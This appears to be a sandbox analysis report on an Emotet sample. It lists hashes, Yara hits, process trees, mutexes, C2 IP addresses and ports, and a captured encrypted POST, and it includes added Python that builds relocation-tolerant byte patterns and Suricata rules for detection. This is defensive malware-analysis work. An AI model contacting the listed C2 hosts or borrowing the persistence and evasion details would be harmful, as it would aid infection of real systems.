
Analysis Report zeD11Fztx8

Overview

General Information

Sample Name: zeD11Fztx8 (renamed file extension from none to exe)
Analysis ID: 384980
MD5: ecbc4b40dcfec4ed1b2647b217da0441
SHA1: e08eb07c69d8fc8e75927597767288a21d6ed7f6
SHA256: 878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
Detection

Emotet
Score: 96 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Emotet
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara signature match

Startup

  • System is w10x64
  • zeD11Fztx8.exe (PID: 6720 cmdline: 'C:\Users\user\Desktop\zeD11Fztx8.exe' MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
    • zeD11Fztx8.exe (PID: 6728 cmdline: C:\Users\user\Desktop\zeD11Fztx8.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
  • storageservice.exe (PID: 6812 cmdline: C:\Windows\SysWOW64\storageservice.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
    • storageservice.exe (PID: 6828 cmdline: C:\Windows\SysWOW64\storageservice.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
  • svchost.exe (PID: 4800 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5688 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6352 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
zeD11Fztx8.exe | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
zeD11Fztx8.exe | Emotet | Emotet Payload | kevoreilly |
  • 0x16f0:$snippet1: FF 15 F8 C1 40 00 83 C4 0C 68 40 00 00 F0 6A 18
  • 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 40 00 85 C0

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.640361081.0000000001381000.00000020.00020000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000002.00000000.638984509.0000000001381000.00000020.00020000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000001.00000000.633157257.0000000001381000.00000020.00020000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000003.00000000.639793428.0000000001381000.00000020.00020000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
(3 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.storageservice.exe.1380000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
3.2.storageservice.exe.1380000.0.unpack | Emotet | Emotet Payload | kevoreilly |
  • 0x16f0:$snippet1: FF 15 F8 C1 38 01 83 C4 0C 68 40 00 00 F0 6A 18
  • 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 38 01 85 C0
1.2.zeD11Fztx8.exe.1380000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
1.2.zeD11Fztx8.exe.1380000.0.unpack | Emotet | Emotet Payload | kevoreilly |
  • 0x16f0:$snippet1: FF 15 F8 C1 38 01 83 C4 0C 68 40 00 00 F0 6A 18
  • 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 38 01 85 C0
3.0.storageservice.exe.1380000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
(11 further entries not shown)
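The two "Emotet Payload" hits differ between the file on disk and the unpacked memory images only in the four operand bytes after each FF 15 (x86 call dword ptr [imm32]): 0x0040C1F8 on disk against 0x0138C1F8 in memory, a shift of 0xF80000, which is exactly the distance from the image base the on-disk addresses imply (0x400000) to the 0x1380000 load address shown in the unpacked-PE names. The sample is linked with DYNAMIC_BASE, so this relocation is expected, and a pattern that hard-codes those bytes will match on disk but miss the same code in a memory dump. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or of kevoreilly's rule (how that rule handles relocation is not shown here). It masks the call operands so one pattern hits both variants, measures the relocation delta from the operands, and decodes the push immediates in the snippets: 0x18 is PROV_RSA_AES and 0xF0000040 is CRYPT_VERIFYCONTEXT | CRYPT_SILENT, the last two arguments of a CryptAcquireContext call. The "images" are constructed zero-filled buffers with the snippets placed at the reported offsets, not the sample itself.

```python
import re
import struct

# Byte patterns copied from the Yara hits above: the same two snippets as matched in the file on
# disk (addresses imply image base 0x400000) and in the unpacked memory images (loaded at 0x1380000).
SNIPPET1_DISK = bytes.fromhex("FF15F8C1400083C40C68400000F06A18")
SNIPPET1_MEM = bytes.fromhex("FF15F8C1380183C40C68400000F06A18")
SNIPPET2_DISK = bytes.fromhex("6A136801000100FF15C4C0400085C0")
SNIPPET2_MEM = bytes.fromhex("6A136801000100FF15C4C0380185C0")

CALL_INDIRECT = b"\xff\x15"  # x86 'call dword ptr [imm32]'; the imm32 is an absolute IAT slot address


def relocation_tolerant_pattern(snippet: bytes) -> re.Pattern:
    """Compile a snippet into a regex that keeps every opcode byte but wildcards the 4-byte
    absolute operand of each 'FF 15' call, so the pattern survives relocation / ASLR."""
    parts, i = [], 0
    while i < len(snippet):
        if snippet[i:i + 2] == CALL_INDIRECT and i + 6 <= len(snippet):
            parts.append(re.escape(CALL_INDIRECT) + b"....")
            i += 6
        else:
            parts.append(re.escape(snippet[i:i + 1]))
            i += 1
    return re.compile(b"".join(parts), re.DOTALL)


PATTERNS = {
    "snippet1": relocation_tolerant_pattern(SNIPPET1_DISK),
    "snippet2": relocation_tolerant_pattern(SNIPPET2_DISK),
}


def scan(image: bytes, patterns=PATTERNS) -> dict:
    """Return {pattern name: [offsets]} for every match in a file or memory image."""
    return {name: [m.start() for m in pat.finditer(image)] for name, pat in patterns.items()}


def call_target(snippet: bytes) -> int:
    """Absolute address referenced by the first 'FF 15' call in the snippet."""
    idx = snippet.index(CALL_INDIRECT)
    return struct.unpack_from("<I", snippet, idx + 2)[0]


def relocation_delta(disk_snippet: bytes, mem_snippet: bytes) -> int:
    """Memory call target minus on-disk call target, i.e. actual base minus preferred base."""
    return call_target(mem_snippet) - call_target(disk_snippet)


def push_immediates(snippet: bytes) -> list:
    """Minimal linear decode of the few opcodes these snippets contain; returns the immediates
    of 'push imm32' (68) and 'push imm8' (6A) in program order and skips the other instructions."""
    imms, i = [], 0
    while i < len(snippet):
        op = snippet[i]
        if op == 0x68:                                   # push imm32
            imms.append(struct.unpack_from("<I", snippet, i + 1)[0])
            i += 5
        elif op == 0x6A:                                 # push imm8
            imms.append(snippet[i + 1])
            i += 2
        elif snippet[i:i + 2] == CALL_INDIRECT:          # call dword ptr [imm32]
            i += 6
        elif snippet[i:i + 2] == b"\x83\xc4":            # add esp, imm8 (cdecl stack clean-up)
            i += 3
        elif snippet[i:i + 2] == b"\x85\xc0":            # test eax, eax
            i += 2
        else:
            raise ValueError(f"unexpected opcode {op:#04x} at offset {i}")
    return imms


def build_image(s1: bytes, s2: bytes, size: int = 0x1800) -> bytes:
    """Constructed stand-in for the sample: a zero-filled buffer with the two snippets placed at
    the offsets Yara reported (0x16f0 and 0x1732)."""
    buf = bytearray(size)
    buf[0x16F0:0x16F0 + len(s1)] = s1
    buf[0x1732:0x1732 + len(s2)] = s2
    return bytes(buf)


DISK_IMAGE = build_image(SNIPPET1_DISK, SNIPPET2_DISK)
MEM_IMAGE = build_image(SNIPPET1_MEM, SNIPPET2_MEM)

if __name__ == "__main__":
    print("disk image:  ", scan(DISK_IMAGE))
    print("memory image:", scan(MEM_IMAGE))
    print("relocation delta: %#x" % relocation_delta(SNIPPET1_DISK, SNIPPET1_MEM))
    print("snippet1 pushes:", [hex(v) for v in push_immediates(SNIPPET1_DISK)])
    print("snippet2 pushes:", [hex(v) for v in push_immediates(SNIPPET2_DISK)])
```

An exact search for the on-disk bytes finds snippet1 at 0x16f0 in the disk image and nothing in the memory image; the wildcarded patterns find both snippets at the same offsets in both. The same masking applies to any absolute-address operand (E8 relative calls do not need it, FF 15 / FF 25 / 8B 0D style absolute references do).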

                    Sigma Overview

                    No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: zeD11Fztx8.exe | Avira: detected
Multi AV Scanner detection for domain / URL
Source: http://173.230.145.224:8080/ | Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: zeD11Fztx8.exe | Virustotal: Detection: 82%
Source: zeD11Fztx8.exe | ReversingLabs: Detection: 96%
Machine Learning detection for sample
Source: zeD11Fztx8.exe | Joe Sandbox ML: detected
Uses 32bit PE files
Source: zeD11Fztx8.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: zeD11Fztx8.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.4:49746 -> 193.169.54.12:8080
Source: global traffic | TCP traffic: 192.168.2.4:49757 -> 173.230.145.224:8080
Source: global traffic | TCP traffic: 192.168.2.4:49763 -> 80.86.91.232:7080
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 193.169.54.12
Source: Joe Sandbox View | IP Address: 193.169.54.12
Source: Joe Sandbox View | IP Address: 80.86.91.232
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 79.172.249.82:443
  Content-Length: 468
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 77 ee 51 67 a8 c2 dc 38 20 bc 12 53 17 05 a1 e7 44 fa 23 2e b7 b8 71 13 ca 5f 34 cb 7d 0c be 09 5f d9 5a 5d 85 11 56 95 de d3 de 12 62 eb a8 08 e0 25 70 14 f1 93 c1 00 4a d5 23 a5 0e 77 2e d9 75 a6 89 1b 16 5a c1 dd 31 ce 32 df 13 a0 62 81 87 92 a5 75 31 ed 00 f4 09 08 7f ae 0e 3e f8 65 d0 b5 42 c2 d2 95 50 fe 33 48 54 55 da 3f 44 b3 df eb cb 47 92 31 e0 5c 2c 4d 46 89 f3 f7 e8 28 63 c8 8b 2d 43 6c f6 74 39 33 7f 21 86 82 16 e9 af 01 09 96 57 45 d8 63 20 47 a2 c1 62 3c 2d 74 bb 9d 73 46 51 ff 00 e2 16 99 bd 8a 96 75 c0 cc 9b 6b c8 76 2f 7d 1f 55 df 13 a3 4e 79 3d 0a 7d c1 09 f3 25 b0 1a 81 32 06 db 60 eb aa f9 77 7f 4f d5 65 00 d6 0f 40 ae d6 80 7d 6d d3 ee 85 09 f6 22 03 2f 33 e5 8b 34 8b db c6 73 67 06 01 9b 17 0a 4e 5b 3c f2 f3 aa 73 a9 cd 5f 3c 34 db da c3 54 41 f5 ea 56 26 df 67 5a 61 72 63 60 16 79 a7 db e1 af f6 2f 66 31 e2 88 4f 2d b7 94 7e cd ce 96 27 93 d4 79 59 88 98 23 46 23 99 b4 91 75 8e c1 dc 3b dd db f3 c3 0e 36 95 96 a2 94 42 6d b3 f7 b1 24 01 e7 71 a7 5e 9b 36 26 b2 96 3c 92 d8 90 7f db 79 c4 c3 fa 4e 68 ad ba 03 e9 19 9e d0 8a 2c 33 fb bd b2 75 f0 06 1f 2a 3f 5d 5b 6a 5d b5 14 d0 23 dd 58 78 93 f6 34 14 5e 10 ba 25 6e 54 d1 9d e9 4b b7 80 6f 7e 87 f1 04 26 22 80 65 b6 e1 bb f9 5c a2 ed 76 32 ff 84 0b d3 07 45 59 19 31 0c fe 79 50 52 83 bd d4 f3 e6 d7 cc e7 56 eb b7 23 59 81 8c 16 9c 72 74 e3 4a 61 67 88 c4 db bf 46 0d 23 37 4c 63 74 58 1e 57 77 32 e6 ef 17 cd 09
  Data Ascii: wQg8 SD#.q_4}_Z]Vb%pJ#w.uZ12bu1>eBP3HTU?DG1\,MF(c-Clt93!WEc Gb<-tsFQukv/}UNy=}%2`wOe@}m"/34sgN[<s_<4TAV&gZarc`y/f1O-~'yY#F#u;6Bm$q^6&<yNh,3u*?][j]#Xx4^%nTKo~&"e\v2EY1yPRV#YrtJagF#7LctXWw2
Source: unknown | TCP traffic detected without corresponding DNS query: 79.172.249.82 (6 entries)
Source: unknown | TCP traffic detected without corresponding DNS query: 193.169.54.12 (3 entries)
Source: unknown | TCP traffic detected without corresponding DNS query: 173.230.145.224 (3 entries)
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.232 (2 entries)
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 to Host: 79.172.249.82:443 (the same request, headers and body, as listed above under the user-agent signature)
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | String found in binary or memory: http://173.230.145.224:8080/
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | String found in binary or memory: http://173.230.145.224:8080/gP
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | String found in binary or memory: http://173.230.145.224:8080/m
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | String found in binary or memory: http://193.169.54.12:8080/
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | String found in binary or memory: http://193.169.54.12:8080//
Source: storageservice.exe, 00000003.00000002.898800934.0000000001048000.00000004.00000020.sdmp | String found in binary or memory: http://79.172.249.82:443/
Source: storageservice.exe, 00000003.00000002.898800934.0000000001048000.00000004.00000020.sdmp | String found in binary or memory: http://79.172.249.82:443/$
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | String found in binary or memory: http://80.86.91.232:7080/
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | String found in binary or memory: http://80.86.91.232:7080/24
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | String found in binary or memory: http://80.86.91.232:7080/7
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | String found in binary or memory: http://80.86.91.232:7080/9.54.12:8080/;
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | String found in binary or memory: http://80.86.91.232:7080/G
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | String found in binary or memory: http://80.86.91.232:7080/ed
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | String found in binary or memory: http://80.86.91.232:7080/h
(The characters after the trailing slash in these URL strings are fragments of neighbouring data in the memory region, not request paths; the request actually observed on the wire is POST /.)
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Creates a DirectInput object (often for capturing keystrokes)
Source: zeD11Fztx8.exe, 00000000.00000002.633588654.0000000000C8A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
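Three properties of this run's network behaviour are more durable than the addresses themselves, which rotate between Emotet builds: every contact is to an IP literal with no preceding DNS query, two of them use 8080 and one 7080, and the one on 443 is plain HTTP (the sandbox parsed a POST with an IE 7 user agent and an IP-literal Host header on the port where TLS would be expected). The Python below is an added example written for this page, not part of the Joe Sandbox report; it takes the report's own lines, copied here as constructed input, collapses them into one record per destination with those flags, and renders placeholder Suricata rules for them. The sid range and message text are this example's own choices, not rules shipped by any vendor.

```python
import re
from collections import defaultdict

# Lines copied from the networking findings above (the long HTTP entry is cut after its headers).
# This is constructed parser input, not a packet capture.
REPORT_LINES = [
    "Source: global traffic TCP traffic: 192.168.2.4:49746 -> 193.169.54.12:8080",
    "Source: global traffic TCP traffic: 192.168.2.4:49757 -> 173.230.145.224:8080",
    "Source: global traffic TCP traffic: 192.168.2.4:49763 -> 80.86.91.232:7080",
    "Source: global traffic HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 "
    "(compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; "
    ".NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 79.172.249.82:443"
    "Content-Length: 468Connection: Keep-AliveCache-Control: no-cache",
    "Source: unknown TCP traffic detected without corresponding DNS query: 79.172.249.82",
    "Source: unknown TCP traffic detected without corresponding DNS query: 193.169.54.12",
    "Source: unknown TCP traffic detected without corresponding DNS query: 173.230.145.224",
    "Source: unknown TCP traffic detected without corresponding DNS query: 80.86.91.232",
    "Source: storageservice.exe String found in binary or memory: http://173.230.145.224:8080/gP",
    "Source: storageservice.exe String found in binary or memory: http://80.86.91.232:7080/9.54.12:8080/;",
    "Source: storageservice.exe String found in binary or memory: http://79.172.249.82:443/$",
    "Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738",
]

IPPORT = r"(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})"
TCP_RE = re.compile(r"TCP traffic: " + IPPORT + r" -> " + IPPORT)
NO_DNS_RE = re.compile(r"without corresponding DNS query: (\d{1,3}(?:\.\d{1,3}){3})")
URL_RE = re.compile(r"https?://" + IPPORT)          # only the host:port; trailing junk is ignored
HTTP_RE = re.compile(r"HTTP traffic detected: (\w+) (\S+) HTTP/1\.\d.*?Host: " + IPPORT)
UA_RE = re.compile(r"User-Agent: (.+?)\s*Host: ")   # tolerates the run-together report layout


def flag_endpoint(endpoint, evidence, no_dns):
    """Behavioural flags worth alerting on independently of the specific address."""
    ip, port = endpoint
    flags = []
    if ip in no_dns:
        flags.append("hardcoded-ip")           # connected without a lookup: address is in the binary
    if port not in (80, 443):
        flags.append("non-standard-port")      # 8080 / 7080 here
    if port == 443 and any(e.startswith("http-") for e in evidence):
        flags.append("plaintext-http-on-443")  # the sandbox parsed cleartext HTTP on the TLS port
    return flags


def extract_endpoints(lines):
    """Collapse per-line report findings into {(ip, port): {"evidence": [...], "flags": [...]}}."""
    no_dns, evidence = set(), defaultdict(set)
    for line in lines:
        if m := NO_DNS_RE.search(line):
            no_dns.add(m.group(1))
        for m in TCP_RE.finditer(line):
            evidence[(m.group(3), int(m.group(4)))].add("tcp-connection")
        for m in URL_RE.finditer(line):
            evidence[(m.group(1), int(m.group(2)))].add("url-string-in-memory")
        if m := HTTP_RE.search(line):
            evidence[(m.group(3), int(m.group(4)))].add("http-%s-request" % m.group(1).lower())
    return {ep: {"evidence": sorted(ev), "flags": flag_endpoint(ep, ev, no_dns)}
            for ep, ev in evidence.items()}


def user_agents(lines):
    """User-Agent strings of the HTTP requests the sandbox logged."""
    found = set()
    for line in lines:
        m = UA_RE.search(line)
        if m:
            found.add(m.group(1))
    return found


def suricata_rules(endpoints, base_sid=1000001):
    """Placeholder local rules, one per endpoint; sid range and msg text are this example's own."""
    rules = []
    for i, ((ip, port), rec) in enumerate(sorted(endpoints.items())):
        rules.append(
            'alert tcp $HOME_NET any -> %s %d (msg:"Emotet C2 %s:%d %s"; '
            'flow:to_server,established; sid:%d; rev:1;)'
            % (ip, port, ip, port, ",".join(rec["flags"]), base_sid + i)
        )
    return rules


if __name__ == "__main__":
    endpoints = extract_endpoints(REPORT_LINES)
    for (ip, port), rec in sorted(endpoints.items()):
        print("%s:%d  evidence=%s  flags=%s" % (ip, port, rec["evidence"], rec["flags"]))
    print("user agents:", user_agents(REPORT_LINES))
    print("\n".join(suricata_rules(endpoints)))
```

The address-specific rules are short-lived; the flags are the part to keep. An outbound HTTP request whose Host header is an IP literal on port 443 from a process other than a browser is a detection on its own, and so is an IE 7 user agent from a host running Windows 10.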

E-Banking Fraud:

Yara detected Emotet
Source: Yara match | File source: zeD11Fztx8.exe, type: SAMPLE
Source: Yara match | File source: 00000001.00000002.640361081.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.638984509.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.633157257.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.639793428.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.898946523.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.632271273.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.640209506.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: zeD11Fztx8.exe, type: SAMPLE | Matched rule: Emotet Payload, Author: kevoreilly
Source: 3.2.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload, Author: kevoreilly
Source: 1.2.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload, Author: kevoreilly
Source: 3.0.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload, Author: kevoreilly
Source: 2.2.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload, Author: kevoreilly
Source: 0.0.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload, Author: kevoreilly
Source: 1.0.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload, Author: kevoreilly
Source: 2.0.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload, Author: kevoreilly
Source: 0.2.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload, Author: kevoreilly
Creates files inside the system directory
Source: C:\Windows\SysWOW64\storageservice.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | File deleted: C:\Windows\SysWOW64\storageservice.exe:Zone.Identifier
Detected potential crypto function
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Code function: 0_2_01386E70
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Code function: 0_2_013877F0
Sample file is different than original file name gathered from version info
Source: zeD11Fztx8.exe, 00000001.00000002.641022607.0000000003780000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs zeD11Fztx8.exe
Source: zeD11Fztx8.exe, 00000001.00000002.641157550.0000000003870000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs zeD11Fztx8.exe
Source: zeD11Fztx8.exe, 00000001.00000002.641157550.0000000003870000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs zeD11Fztx8.exe
Uses 32bit PE files
Source: zeD11Fztx8.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: zeD11Fztx8.exe, type: SAMPLE | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 3.2.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 1.2.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 3.0.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 2.2.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0.0.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 1.0.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 2.0.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0.2.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: classification engine | Classification label: mal96.troj.evad.winEXE@9/0@0/4
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Code function: 0_2_01382110: CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CloseHandle
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\I7AD90449
Source: C:\Windows\SysWOW64\storageservice.exe | Mutant created: \BaseNamedObjects\Global\I7AD90449
Source: C:\Windows\SysWOW64\storageservice.exe | Mutant created: \BaseNamedObjects\M7B1EF2AC
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\M7AD90449
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Mutant created: \Sessions\1\BaseNamedObjects\MAA169F89
Source: zeD11Fztx8.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: zeD11Fztx8.exe | Virustotal: Detection: 82%
Source: zeD11Fztx8.exe | ReversingLabs: Detection: 96%
Source: unknown | Process created: C:\Users\user\Desktop\zeD11Fztx8.exe 'C:\Users\user\Desktop\zeD11Fztx8.exe'
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Process created: C:\Users\user\Desktop\zeD11Fztx8.exe C:\Users\user\Desktop\zeD11Fztx8.exe
Source: unknown | Process created: C:\Windows\SysWOW64\storageservice.exe C:\Windows\SysWOW64\storageservice.exe
Source: C:\Windows\SysWOW64\storageservice.exe | Process created: C:\Windows\SysWOW64\storageservice.exe C:\Windows\SysWOW64\storageservice.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Process created: C:\Users\user\Desktop\zeD11Fztx8.exe C:\Users\user\Desktop\zeD11Fztx8.exe
Source: C:\Windows\SysWOW64\storageservice.exe | Process created: C:\Windows\SysWOW64\storageservice.exe C:\Windows\SysWOW64\storageservice.exe
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: zeD11Fztx8.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Code function: 0_2_01381F40: VirtualAlloc, memcpy, memcpy, LoadLibraryA, GetProcAddress, VirtualFree

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\SysWOW64\storageservice.exe | Executable created and started: C:\Windows\SysWOW64\storageservice.exe
Drops PE files to the windows directory (C:\Windows)
